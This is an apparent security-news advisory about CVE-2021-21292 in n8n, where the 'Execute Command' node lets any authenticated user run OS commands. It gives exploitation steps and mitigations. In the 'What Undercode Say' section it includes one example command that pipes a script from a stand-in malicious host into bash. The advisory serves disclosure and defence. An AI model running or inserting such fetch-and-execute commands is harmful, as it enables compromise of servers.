Listen to this Post
The CVE-2021-21292 vulnerability stems from the inherent functionality of the ‘Execute Command’ node within the n8n workflow automation platform. This node is designed to execute arbitrary operating system commands on the underlying host, a powerful feature for advanced automation tasks. The security issue is not a code flaw in the traditional sense but a dangerous default configuration where this powerful node is available to all authenticated users. In a deployment where not all users are fully trusted, a malicious actor with a standard user account can leverage this node to run any system command. This exploitation does not require bypassing any security controls within n8n itself; the node is explicitly designed for this purpose. An attacker can craft a workflow that uses this node to execute commands for malicious purposes, such as spawning a reverse shell, exfiltrating sensitive files from the host, or installing malware, leading to a full compromise of the server n8n is running on.
Platform: n8n
Version: All versions
Vulnerability: Code Injection
Severity: Critical
date: 2021-01-21
Prediction: Patch: 2021-02-15
What Undercode Say:
Check if n8n process is running ps aux | grep n8n Example of a dangerous command that could be executed via the node curl http://malicious-site.com/exploit.sh | bash List running processes after potential exploit ps -ef
How Exploit:
Attacker authenticates to n8n.
Creates or edits a workflow.
Adds the ‘Execute Command’ node.
Inserts malicious OS commands.
Executes the workflow.
Protection from this CVE
Set NODES_EXCLUDE environment variable.
Disable the node.
Restrict user access.
Use n8n.cloud.
Impact:
Full system compromise.
Data exfiltration.
Service disruption.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
